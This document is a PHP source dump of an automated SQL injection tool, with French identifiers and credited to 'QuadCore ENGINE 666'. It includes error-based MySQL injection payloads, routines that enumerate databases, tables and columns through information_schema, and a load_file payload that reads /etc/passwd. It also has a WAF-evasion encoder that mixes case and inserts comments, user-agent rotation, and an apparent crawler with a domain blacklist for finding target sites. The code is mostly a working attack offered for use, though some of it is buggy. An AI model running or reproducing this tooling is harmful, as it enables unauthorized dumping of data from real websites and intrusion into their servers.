 585 | 			$url_f = $_url_base . urlencode(preg_replace('/'.$i.'/', $param, $_url_params, 1));
 586 |             $page = $this->hr->get($url_f);
 587 |             if (strpos($page, $this->okstr) !== false)
 588 |             {
 589 |                 return $i;
 590 |             }
 591 |             $page = "";
 592 |         }
 593 |         return -1;
 594 |     }
 595 |     private function GenSynHex($index)
 596 |     {
 597 |         $concat = "";
 598 |         for ($i = 0; $i <= $index; $i++)
 599 | 		{
 600 |             if ($i + 1 > $index)
 601 | 		        $concat .= $this->ch->getHex($this->syntax_count);
 602 |             else
 603 |                 $concat .= $this->ch->getHex($this->syntax_count) . ",";
 604 | 		}
 605 |         return $concat;
 606 |     }
 607 | }
 608 | 
 609 | /**
 610 | * sqli_check
 611 | */
 612 | class sqli_check
 613 | {
 614 | 	function __construct()
 615 | 	{ $this->ch = new chaine(); $this->hr = new Curl(); }
 616 |     private $_param = Array();
 617 |     private $var_n = "[t]";
 618 |     private $baseI = "(select 1 from(select count(*),concat((select(select [t]) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
 619 |     private $baseF = "unhex(hex(concat([t])))"; //0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21
 620 |     private $testSTR = "QUADCOREEE66615";
 621 |     private $sqli = "'A=0";
 622 |     private $separateur = "!~!";
 623 |     private $hr;
 624 |     private $ch;
 625 | 
 626 |     public function demmareAnalyseFast($url)
 627 |     {
 628 |         $url_racine = current(explode("?", $url));
 629 |         $_param = $this->ch->analyseParam($url);
 630 |         for ($i = 0; $i < count($_param); $i++)
 631 |         {
 632 |             $url_c = $url_racine . $this->ch->genParamParIndex($_param, 0, $i + 1) . $this->sqli . $this->ch->genParamParIndex($_param, $i + 1, count($_param));
 633 |             $page = $this->hr->get($url_c);
 634 | 	        if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$page, $matches) || strpos($page, 'You have an error in your SQL syntax') !== false) 
 635 | 			{ 
 636 | 				return true;
 637 | 			} 
 638 | 			else
 639 | 			{ 
 640 | 				return false;
 641 | 			}
 642 |         }
 643 |         return false; 
 644 |     }
 645 |     public function demmareAnalyseAvanced($url)
 646 |     {
 647 |         $url_racine = current(explode('?', $url));
 648 |         $_param = $this->ch->analyseParam($url);
 649 | 
 650 |         $param_curr = str_replace($this->var_n, str_replace($this->var_n, $this->ch->getHex($this->separateur) . "," . $this->ch->getHex($this->testSTR) . "," . $this->ch->getHex($this->separateur), $this->baseF), $this->baseI);
 651 | 
 652 |         for ($i = 0; $i < count($_param); $i++)
 653 |         {
 654 |             $url_c = $url_racine . $this->ch->ViderDernierParam($this->ch->genParamParIndex($_param, 0, $i + 1)) . $this->ch->Encode($param_curr) . $this->ch->genParamParIndex($_param, $i + 1, count($_param));
 655 |             $page = $this->hr->get($url_c);
 656 |             if (strpos($page, $this->testSTR) !== false)
 657 |             {
 658 |                 return true;
 659 |             }
 660 |         }
 661 |         return false;
 662 |     }
 663 |     public function fichierLoad($url)
 664 |     {
 665 |         $inj = "(select concat(0x217e21,ifnull(load_file(0x2f6574632f706173737764),char(32)),0x332150,ifnull(length(load_file(0x2f6574632f706173737764)),char(32)),0x217e21) )";
 666 |     }
 667 | 
 668 |     private function verifPage($page)
 669 |     {
 670 |     	if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()
 671 | 			|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL
 672 | 			|Syntax error|Fatal error/i",$page, $matches) || strpos($page, 'You have an error in your SQL syntax') !== false) 
 673 | 		{ 
 674 | 			return true;
 675 | 		} 
 676 | 		else
 677 | 		{ 
 678 | 			return false;
 679 | 		}
 680 |     }
 681 | }
 682 | 
 683 | /**
 684 | * sqli_dump
 685 | */
 686 | class sqli_dump
 687 | {
 688 | 	function __construct()
 689 | 	{
 690 | 		$this->hr = new Curl();
 691 | 		$this->ch = new chaine();
 692 | 	}
 693 | 	private $separateur = "!~!";
 694 |     private $s_separateur = "3!P";
 695 |     private $var_n = "[t]";
 696 |     private $hr;
 697 |     private $ch;
 698 |     private $_url_point;
 699 |     public function controlleur($url)
 700 |     {
 701 |         $this->_url_point = $this->ch->Encode($url);
 702 |         if(setInfos())
 703 |         {
 704 |             return true;
 705 |         }
 706 |         else { return false; }
 707 |     }
 708 |     public function setInfos()
 709 |     {
 710 |         $oo = new Outils();
 711 |         $url_g = str_replace($this->var_n, "concat(" . $this->ch->getHex($this->separateur) . ",concat(user()," . $this->ch->getHex($this->s_separateur) . ",version()," . $this->ch->getHex($this->_separateur) . ",database())," . $this->ch->getHex($this->separateur) . ")", $this->_url_point);
 712 |         $page = $this->hr->get($url_g);
 713 |         if (strpos($page, $this->separateur) !== false)
 714 |         {
 715 |             $rslt = $this->ch->extSubResult($this->s_separateur, $this->ch->extResult($this->separateur, $page));
 716 |             $hote = explode('/', $this->_url_point);
 717 |             $ip = $oo->avoirip($hote[2]);
 718 |             setBD($rslt[2]);
 719 |             $_SESSION["analyse_infos"] = $rslt."'~!'".$ip;
 720 | 
 721 |             /* form_principale.txt_user.Text = rslt[0];
 722 |             form_principale.txt_version.Text = rslt[1];
 723 |             form_principale.txt_ipserveur.Text = ip; */
 724 |            
 725 |             return true;
 726 |         }
 727 |         else
 728 |         {
 729 |             return false;
 730 |         }
 731 |     }
 732 |     private function setBD($bd)
 733 |     {
 734 |         $_SESSION["basededonnes"] = $bd;
 735 |     }
 736 |     private function setAllBD()
 737 |     {
 738 |         $nbr = 0;
 739 |         try { $nbr = getNombreDB(); }
 740 |         catch (Exception $e) { } 
 741 |         $inj = "(select distinct concat(" . $this->ch->getHex($separateur) . ",group_concat(schema_name)," . $this->ch->getHex($this->separateur) . ") from information_schema.schemata where not schema_name=" . $this->ch->getHex("information_schema") . ")";
 742 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 743 |         $page = $this->hr->get($url_f);
 744 |         $dbbrut = $this->ch->extResult($separateur, $page);
 745 | 
 746 |         if ($dbbrut != "")
 747 |         {
 748 |             if ($nbr > 1)
 749 |             {
 750 |                 $basededonnes = explode(',', $dbbrut);
 751 |                 $groupeBD = "";
 752 |                 foreach ($basededonnes as $bd)
 753 |                 {
 754 |                     if ($bd != "")
 755 |                     {
 756 |                     	$groupeBD .= $bd . "\r\n";
 757 |                     }
 758 |                 }
 759 |                 $_SESSION["basededonnes"] = $groupeBD;
 760 |             }
 761 |             else
 762 |             {
 763 |             	$_SESSION["basededonnes"] = $dbbrut."\r\n";
 764 |             } 
 765 |         }
 766 |     }
 767 |     private function setTable($db_name, $node_i)
 768 |     {
 769 |         $nbr = 0;
 770 |         try { $nbr = getNombreTable($db_name); }
 771 |         catch (Exception $e) { }
 772 |         //(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x6d6f64656c73686f5f6462)
 773 |         $inj = "(select distinct concat(" . $this->ch->getHex($separateur) . ",unhex(Hex(cast(group_concat(table_name) as char)))," . $this->ch->getHex($separateur) . ") from information_schema.tables where table_schema=" . $this->ch->getHex($db_name) . ")";
 774 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 775 |         $page = $this->hr->get($url_f);
 776 |         $tablebrut = $this->ch->extResult($separateur, $page);
 777 | 
 778 |         if ($nbr > 1)
 779 |         {
 780 |             $tables = explode(',', $tablebrut);
 781 |             $groupeTable = "";
 782 |             foreach ($tables as $table)
 783 |             {
 784 |                 if ($table != "")
 785 |                 {
 786 |                     $groupeTable .= $table . "\r\n";
 787 |                 }
 788 |             }
 789 |             $_SESSION["tables"] = $groupeTable;
 790 |         }
 791 |         else
 792 |         {
 793 |             $_SESSION["tables"] = $tablebrut . "\r\n";
 794 |         }
 795 |     }
 796 |     private function setColonne($db_name, $table_name, $node_d_i, $noe_t_i )
 797 |     {
 798 |     	$nbr = 0;
 799 |         try { $nbr = getNombreColonne($db_name, $table_name); }
 800 |         catch (Exception $e) { } 
 801 |         $inj = "(select distinct concat(" . $this->ch->getHex($this->separateur) . ",unhex(Hex(cast(group_concat(column_name) as char)))," . $this->ch->getHex($this->separateur) . ") from information_schema.columns where table_schema=" . $this->ch->getHex($db_name) . " and table_name=" . $this->ch->getHex($table_name) . ")";
 802 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 803 |         $page = $this->hr->get($url_f);
 804 |         $colonnebrut = $this->ch->extResult($this->separateur, $page);
 805 | 
 806 |         if ($nbr > 1)
 807 |         {
 808 |             $colonnes = explode(',', $colonnebrut);
 809 |             $colonneGroupe = "";
 810 |             foreach ($colonnes as $colonne)
 811 |             {
 812 |                 if ($colonne != "")
 813 |                 {
 814 |                 	$colonneGroupe .= $colonne."\r\n";
 815 |                 }
 816 |             }
 817 |             $_SESSION["colonnes"] = $colonneGroupe;
 818 |         }
 819 |         else
 820 |         {
 821 |             $_SESSION["colonnes"] = $colonnebrut."\r\n";
 822 |         }
 823 |     }
 824 |     private function getNombreColonne($db_name, $tb_name)
 825 |     {
 826 |         $inj = "(select concat(" . $this->ch->getHex($separateur) . ",count(0)," . $this->ch->getHex($this->separateur) . ") from information_schema.columns where table_schema=" . $this->ch->getHex($db_name) . " and table_name=".$this->ch->getHex($tb_name).")";
 827 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 828 |         $page = $this->hr->get($url_f);
 829 |         return intval($this->ch->extResult($this->separateur, $page));
 830 |     }
 831 |     private function getNombreTable($db_name)
 832 |     {
 833 |         $inj = "(select concat(" . $this->ch->getHex($separateur) . ",count(0)," . $this->ch->getHex($separateur) . ") from information_schema.tables where table_schema=" . $this->ch->getHex($db_name) . ")";
 834 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 835 |         $page = $this->hr->get($url_f);
 836 |         return intval($this->ch->extResult($this->separateur, $page));
 837 |     }
 838 |     private function getNombreDB()
 839 |     {
 840 |         $inj = "(select concat(" . $this->ch->getHex($separateur) . ",count(0)," . $this->ch->getHex($separateur) . ") from information_schema.schemata where not schema_name=" . $this->ch->getHex("information_schema") . ")";
 841 |         $url_f = str_replace($this->var_n, $this->ch->Encode($inj), $this->_url_point);
 842 |         $page = $this->hr->get($url_f);
 843 |         return intval($this->ch->extResult($this->separateur, $page));
 844 |     }
 845 | }
 846 | 
 847 | /**
 848 | * chaine
 849 | */
 850 | class chaine
 851 | {
 852 | 	public function genParamParIndex($_param, $start = 0, $fin = -1)
 853 |     {
 854 |         $bind = "";
 855 |         for ($i = $start; $i < $fin; $i++)
 856 |         {
 857 |         	if(isset($_param[$i]))
 858 |         	{
 859 | 	            if ($i == 0) 
 860 | 	            	{ $bind .= $_param[$i]; }
 861 | 	            else 
 862 | 	            	{ $bind .= "&" + $_param[$i]; }
 863 |         	}
 864 |         }
 865 |         return $bind;
 866 |     }
 867 |     public function ViderDernierParam($param)
 868 |     {
 869 |         $bind = "";
 870 |         $_param = array();
 871 |         $Tparam = explode('?', $param);
 872 |         $Tparam = "?" . $Tparam[1];
 873 |         $pa = explode("&", $Tparam);
 874 |         $_param = $pa;
 875 |         for ($i = 0; $i < count($_param); $i++)
 876 |         {
 877 |             if ($i + 1 == count($_param))
 878 |             {
 879 |                 $bind .= $this->escapeParam($_param[$i]);
 880 |             }
 881 |             else //(i == 0 && i != _param.Count)
 882 |             {
 883 |                 $bind .= $_param[$i];
 884 |             }
 885 |         }
 886 |         return $bind;
 887 |     }
 888 |     public function analyseParam($url)
 889 |     {
 890 |         $_param = array();
 891 |         if (strpos($url, '?') !== false)
 892 |         {
 893 |         	$Tparam = explode('?', $url);
 894 |         	$Tparam = "?" . $Tparam[1];
 895 |             $param = explode('&', $Tparam);
 896 |             $_param = $param;
 897 |         }
 898 |         return $_param;
 899 |     }
 900 |     public function escapeParam($param)
 901 |     {
 902 |         return current(explode('=', $param)) . "=";
 903 |     }
 904 |     public function genNbrColonneVise($nbr_table, $index_var = -1)
 905 |     {
 906 |         $bind = "";
 907 |         for ($i = 1; $i <= $nbr_table + 1; $i++)
 908 |         {
 909 |             if ($i + 1 > $nbr_table + 1) 
 910 |             { 
 911 |                 $bind .= $i; 
 912 |             }
 913 |             else if ($i == $index_var)
 914 |             {
 915 |                 $bind .= "[t],";
 916 |             }
 917 |             else 
 918 |             { 
 919 |                 $bind .= $i . ","; 
 920 |             }
 921 |         }
 922 |         return $bind;
 923 |     }
 924 |     public function extResult($separateur, $page)
 925 |     {
 926 |         $result = "";
 927 |         if(strpos($page, $separateur) !== false)
 928 |         {
 929 |             $result = explode($separateur, $page);
 930 |             return $result[1];
 931 |         }
 932 |         else
 933 |         {
 934 |             return "";
 935 |         }
 936 |     }
 937 |     public function extSubResult($s_separateur, $page)
 938 |     {
 939 |         $result = array();
 940 |         if (strpos($page, $separateur) !== false)
 941 |         {
 942 |             $result = explode($s_separateur, $page);
 943 |             return $result;
 944 |         }
 945 |         else
 946 |         {
 947 |             return $result;
 948 |         }
 949 |     }
 950 |     public function Encode($url)
 951 |     {
 952 |         $com = "%2f**%2f";
 953 |         $url = str_replace("select", $com . "sElEcT",$url);
 954 |         $url = str_replace("from", $com . "fRoM",$url);
 955 |         $url = str_replace("union", $com . "uNiOn",$url);
 956 |         $url = str_replace("group_concat", $com . "gRoUp_cOnCaT",$url);
 957 |         $url = str_replace("concat", $com . "cOnCaT",$url);
 958 |         $url = str_replace("limit", $com . "lImIt",$url);
 959 |         $url = str_replace("group by", $com . "gRoUp" . $com . "bY",$url);
 960 |         $url = str_replace("unhex", $com . "uNhEx",$url);
 961 |         $url = str_replace("hex", $com . "hEx",$url);
 962 |         $url = str_replace("schemata", $com . "sChEmAtA",$url);
 963 |         $url = str_replace("table_name", $com . "tAbLe_nAmE",$url);
 964 |         $url = str_replace("table_schema", $com . "tAbLe_sChEmA",$url);
 965 |         $url = str_replace("tables", $com . "tAbLeS",$url);
 966 |         $url = str_replace("column_name", $com . "cOlUmN_NaMe",$url);
 967 |         $url = str_replace("columns", $com . "cOlUmNs",$url);
 968 |         $url = str_replace("version", $com . "vErSiOn",$url);
 969 |         $url = str_replace("distinct", $com . "dIsTiNcT",$url);
 970 |         $url = str_replace("all", $com . "aLl",$url);
 971 |         $url = str_replace("user", $com . "uSeR",$url);
 972 |         $url = str_replace("database", $com . "dAtAbAsE",$url);
 973 |         $url = str_replace("  ", " ",$url);
 974 |         $url = str_replace(" ", "+",$url);
 975 |         return $url;
 976 |     }
 977 |     public function getHex($str)
 978 |     {
 979 |         $hex = '';
 980 |     	for ($i=0; $i<strlen($str); $i++)
 981 |     	{
 982 | 	        $ord = ord($str[$i]);
 983 | 	        $hexCode = dechex($ord);
 984 | 	        $hex .= substr('0'.$hexCode, -2);
 985 | 	    }
 986 |     	return "0x".strtolower($hex);
 987 |     }
 988 |     public function getStringHex($hex)
 989 |     {
 990 |         $string='';
 991 | 	    for ($i=0; $i < strlen($hex)-1; $i.=2){
 992 | 	        $string .= chr(hexdec($hex[$i].$hex[$i+1]));
 993 | 	    }
 994 | 	    return $string;
 995 |     }
 996 | }
 997 | /**
 998 | * SQLI_check_class
 999 | */
1000 | /**
1001 | * BY QuadCore ENGINE 666 /-\
1002 | * banncorx@gmail.com
1003 | */
1004 | ?>
1005 | 


--------------------------------------------------------------------------------
/request/sql/Chaine.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class chaine
  3 | {
  4 | 	public function genParamParIndex($_param, $start = 0, $fin = -1)
  5 |     {
  6 |         $bind = '';
  7 |         for ($i = $start; $i < $fin; $i++)
  8 |         {
  9 |         	if(isset($_param[$i]))
 10 |         	{
 11 | 	            if ($i == 0) 
 12 | 	            	{ $bind .= $_param[$i]; }
 13 | 	            else 
 14 | 	            	{ $bind .= '&' + $_param[$i]; }
 15 |         	}
 16 |         }
 17 |         return $bind;
 18 |     }
 19 |     public function ViderDernierParam($param)
 20 |     {
 21 |         $bind = '';
 22 |         $_param = array();
 23 |         $Tparam = explode('?', $param);
 24 |         $Tparam = '?' . $Tparam[1];
 25 |         $pa = explode('&', $Tparam);
 26 |         $_param = $pa;
 27 |         for ($i = 0; $i < count($_param); $i++)
 28 |         {
 29 |             if ($i + 1 == count($_param))
 30 |             {
 31 |                 $bind .= $this->escapeParam($_param[$i]);
 32 |             }
 33 |             else //(i == 0 && i != _param.Count)
 34 |             {
 35 |                 $bind .= $_param[$i];
 36 |             }
 37 |         }
 38 |         return $bind;
 39 |     }
 40 |     public function analyseParam($url)
 41 |     {
 42 |         $_param = array();
 43 |         if (strpos($url, '?') !== false)
 44 |         {
 45 |         	$Tparam = explode('?', $url);
 46 |         	$Tparam = '?' . $Tparam[1];
 47 |             $param = explode('&', $Tparam);
 48 |             $_param = $param;
 49 |         }
 50 |         return $_param;
 51 |     }
 52 |     public function escapeParam($param)
 53 |     {
 54 |         return current(explode('=', $param)) . '=';
 55 |     }
 56 |     public function genNbrColonneVise($nbr_table, $index_var = -1)
 57 |     {
 58 |         $bind = '';
 59 |         for ($i = 1; $i <= $nbr_table + 1; $i++)
 60 |         {
 61 |             if ($i + 1 > $nbr_table + 1) 
 62 |             { 
 63 |                 $bind .= $i; 
 64 |             }
 65 |             else if ($i == $index_var)
 66 |             {
 67 |                 $bind .= '[t],';
 68 |             }
 69 |             else 
 70 |             { 
 71 |                 $bind .= $i . ','; 
 72 |             }
 73 |         }
 74 |         return $bind;
 75 |     }
 76 |     public function extResult($separateur, $page)
 77 |     {
 78 |         $result = '';
 79 |         if(strpos($page, $separateur) !== false)
 80 |         {
 81 |             $result = explode($separateur, $page);
 82 |             return $result[1];
 83 |         }
 84 |         else
 85 |         {
 86 |             return '';
 87 |         }
 88 |     }
 89 |     public function extSubResult($s_separateur, $page)
 90 |     {
 91 |         $result = array();
 92 |         if (strpos($page, $s_separateur) !== false)
 93 |         {
 94 |             $result = explode($s_separateur, $page);
 95 |             return $result;
 96 |         }
 97 |         else
 98 |         {
 99 |             return $result;
100 |         }
101 |     }
102 |     public function Encode($url)
103 |     {
104 |         $com = '%2f**%2f';
105 |         $url = str_replace('select', $com . 'sElEcT',$url);
106 |         $url = str_replace('from', $com . 'fRoM',$url);
107 |         $url = str_replace('union', $com . 'uNiOn',$url);
108 |         $url = str_replace('group_concat', $com . 'gRoUp_cOnCaT',$url);
109 |         $url = str_replace('concat', $com . 'cOnCaT',$url);
110 |         $url = str_replace('limit', $com . 'lImIt',$url);
111 |         $url = str_replace('group by', $com . 'gRoUp' . $com . 'bY',$url);
112 |         $url = str_replace('unhex', $com . 'uNhEx',$url);
113 |         $url = str_replace('hex', $com . 'hEx',$url);
114 |         $url = str_replace('schemata', $com . 'sChEmAtA',$url);
115 |         $url = str_replace('table_name', $com . 'tAbLe_nAmE',$url);
116 |         $url = str_replace('table_schema', $com . 'tAbLe_sChEmA',$url);
117 |         $url = str_replace('tables', $com . 'tAbLeS',$url);
118 |         $url = str_replace('column_name', $com . 'cOlUmN_NaMe',$url);
119 |         $url = str_replace('columns', $com . 'cOlUmNs',$url);
120 |         $url = str_replace('version', $com . 'vErSiOn',$url);
121 |         $url = str_replace('distinct', $com . 'dIsTiNcT',$url);
122 |         $url = str_replace('all', $com . 'aLl',$url);
123 |         $url = str_replace('user', $com . 'uSeR',$url);
124 |         $url = str_replace('database', $com . 'dAtAbAsE',$url);
125 |         $url = str_replace('  ', ' ',$url);
126 |         $url = str_replace(' ', '+',$url);
127 |         return $url;
128 |     }
129 |     public function getHex($str)
130 |     {
131 |         $hex = '';
132 |     	for ($i=0; $i<strlen($str); $i++)
133 |     	{
134 | 	        $ord = ord($str[$i]);
135 | 	        $hexCode = dechex($ord);
136 | 	        $hex .= substr('0'.$hexCode, -2);
137 | 	    }
138 |     	return '0x'.strtolower($hex);
139 |     }
140 |     public function getStringHex($hex)
141 |     {
142 |         $string='';
143 | 	    for ($i=0; $i < strlen($hex)-1; $i.=2){
144 | 	        $string .= chr(hexdec($hex[$i].$hex[$i+1]));
145 | 	    }
146 | 	    return $string;
147 |     }
148 | }


--------------------------------------------------------------------------------
/request/sql/Curl.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class Curl
  3 | {
  4 | 	var $proxy		=	"";
  5 | 	var $cookie		=	"";
  6 | 	var $header		=	"";
  7 | 
  8 | 	function __construct() {
  9 | 		$this->proxy = "";
 10 | 		$this->cookie = tempnam ("/tmp", "cookie");
 11 | 		$this->headers[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
 12 | 		$this->headers[] = "Connection: keep-alive";
 13 | 		$this->headers[] = "Keep-Alive: 115";
 14 | 		$this->headers[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 15 | 		$this->headers[] = "Accept-Language: en-us,en;q=0.5";
 16 | 		$this->headers[] = "Pragma: ";
 17 | 	}
 18 | 
 19 | 	function get($url)
 20 | 	{
 21 | 		$ch = curl_init();
 22 | 
 23 | 		curl_setopt($ch, CURLOPT_URL, $url);
 24 | 		curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 25 | 		curl_setopt($ch, CURLOPT_USERAGENT, $this->getRUA());
 26 | 		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
 27 |         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 28 |         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 29 |         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 30 |         curl_setopt($ch, CURLOPT_MAXREDIRS, 2);
 31 | 
 32 |         curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
 33 | 
 34 | 		$output = curl_exec($ch);
 35 | 		curl_close ($ch);
 36 | 		return $output;
 37 | 	}
 38 | 	function getA($url)
 39 | 	{
 40 | 		$ch = curl_init();
 41 | 
 42 | 		curl_setopt($ch, CURLOPT_URL, $url);
 43 | 		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 44 | 		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 45 | 		curl_setopt($ch, CURLOPT_USERAGENT, $this->getRUA());
 46 | 		curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
 47 | 		curl_setopt($ch, CURLOPT_HTTPHEADER, $this->headers);
 48 | 		curl_setopt($ch, CURLOPT_COOKIEFILE,  $this->cookie);
 49 | 		curl_setopt($ch, CURLOPT_COOKIEJAR,  $this->cookie);
 50 | 		curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
 51 | 		curl_setopt($ch, CURLOPT_MAXREDIRS, 2);
 52 | 		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 53 | 
 54 | 		$data = curl_exec($ch);
 55 | 		curl_close($ch);
 56 | 		return $data;
 57 | 	}
 58 | 	function post($url, $datas)
 59 | 	{
 60 | 	  	$postData = '';
 61 | 	   	foreach($datas as $k => $v) {
 62 |         	$postData .= $k . '='.urlencode($v).'&';
 63 | 	   	}
 64 | 	   	rtrim($postData, '&');
 65 | 
 66 | 	    $ch = curl_init();
 67 | 
 68 | 	    curl_setopt($ch, CURLOPT_URL, $url);
 69 | 	    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
 70 | 	    curl_setopt($ch, CURLOPT_USERAGENT, $this->getRUA());
 71 | 	    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 72 | 	    curl_setopt($ch, CURLOPT_HEADER, false);
 73 | 	    curl_setopt($ch, CURLOPT_POST, count($postData));
 74 |         curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
 75 |         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 76 |         curl_setopt($ch, CURLOPT_MAXREDIRS, 2);
 77 | 
 78 | 	    $output = curl_exec($ch);
 79 | 	    curl_close($ch);
 80 | 	    return $output;
 81 | 	}
 82 | 
 83 | 	function getRUA()
 84 | 	{
 85 | 	    $user_agents = array(
 86 | 	    	'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36',
 87 | 	        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
 88 | 	        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
 89 | 	        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
 90 | 	        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
 91 | 	        'Opera/9.20 (Windows NT 6.0; U; en)',
 92 | 	        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1',
 93 | 	        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36',
 94 | 	        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50',
 95 | 	        'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]',
 96 | 	        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Macurl-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9',
 97 | 	        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48',
 98 | 	    );
 99 | 	    return $user_agents[rand(0, count($user_agents)-1)];
100 | 	}
101 | }
102 | 


--------------------------------------------------------------------------------
/request/sql/Extracteur.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Extracteur
 3 | {
 4 | 	function RepareGog($url)
 5 | 	{
 6 | 		$url = $this->Decode($url);
 7 | 		$url = str_replace('/url?q=', '', $url);
 8 | 		$arrfin = explode('&sa=', $url);
 9 | 		$url = $arrfin[0];
10 | 		return html_entity_decode(urldecode($url));
11 | 	}
12 | 	function Decode($str)
13 | 	{
14 | 		return html_entity_decode(urldecode($str));
15 | 	}
16 |   private function getNomDom($url)
17 |   {
18 |   	$u = explode('/', $url);
19 |   	return $u[2];
20 |   }
21 |   function BlackList($url)
22 |   {
23 |     $black = array(
24 |       'google',
25 |       'msn',
26 |       'yahoo',
27 |       'ebay',
28 |       'youtube',
29 |       'facebook',
30 |       'twitter',
31 |       'github',
32 |       'pastebin.com',
33 |       'stackoverflow.com',
34 | 	  	'.phpni.',
35 |       'php.net',
36 |     );
37 |     $ok = false;
38 |     foreach($black as $element)
39 |     {
40 |       if(strpos($url, $element) !== false)
41 |       {
42 |         $ok = true;
43 |         break;
44 |       }
45 |     }
46 |     return $ok;
47 |   }
48 |   function VerfierURL($url)
49 | 	{
50 | 	    $domUrl = $this->getNomDom($url);
51 | 	    if((!$this->VerfierExistDom($domUrl)) && (!$this->BlackList($url)))
52 | 	    {
53 | 	      if(isset($_POST['url_with_param']) && $_POST['url_with_param'] == 1)
54 | 	      {
55 | 	        if((strpos('?', $url) !== false) && (strpos('=', $url) !== false)) {
56 | 	          return true; }
57 | 	        else {
58 | 	          return false;
59 | 	        }
60 | 	      }
61 | 	      else
62 | 	      {
63 | 	        return true;
64 | 	      }
65 | 	    }
66 | 	}
67 |   function VerfierExistDom($dom)
68 |   {
69 |   	$ok = false;
70 |   	if(isset($_SESSION['url_trouver'])) {
71 | 		    $Urls = $_SESSION['url_trouver'];
72 | 		    foreach ($Urls as $element)
73 | 		    {
74 | 		        if(!empty($element) && strpos($dom, $element) !== false)
75 | 		        {
76 | 		          $ok = true;
77 | 		          break;
78 | 		        } else { }
79 | 		    }
80 | 		}
81 |     return $ok;
82 |   }
83 | }
84 | 


--------------------------------------------------------------------------------
/request/sql/Includer.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	require_once 'Curl.php';
 3 | 
 4 | 	include_once 'Extracteur.php';
 5 | 	include_once 'Rechercheur.php';
 6 | 
 7 | 	include_once 'Chaine.php';
 8 | 	include_once 'Scanneur.php';
 9 | 	include_once 'Scanneur.php';
10 | 
11 | 	include_once 'Scanneur.php';
12 | 	include_once dirname(__FILE__).DS.'sqli_class'.DS.'sqli_colonne.php';
13 | 	include_once dirname(__FILE__).DS.'sqli_class'.DS.'sqli_inject.php';
14 | 	include_once dirname(__FILE__).DS.'sqli_class'.DS.'sqli_dump.php';
15 | 


--------------------------------------------------------------------------------
/request/sql/Rechercheur.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class Rechercheur
  3 | {
  4 | 	public $curl;
  5 | 	public $ext;
  6 | 	public $errors;
  7 | 	var $keyword	=	"empty";
  8 | 	var $urlList	=	"";
  9 | 	var $time1		=	4000000;
 10 | 	var $time2		=	8000000;
 11 | 	var $proxy		=	"";
 12 | 	var $cookie		=	"";
 13 | 	var $header		=	"";
 14 | 	var $ei			=	"";
 15 | 
 16 | 	function __construct() {
 17 | 		$this->curl = new Curl();
 18 | 		$this->ext = new Extracteur();
 19 | 		$this->errors = array();
 20 | 
 21 | 		$this->cookie = tempnam ("/tmp", "cookie");
 22 | 		$this->headers[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
 23 | 		$this->headers[] = "Connection: keep-alive";
 24 | 		$this->headers[] = "Keep-Alive: 115";
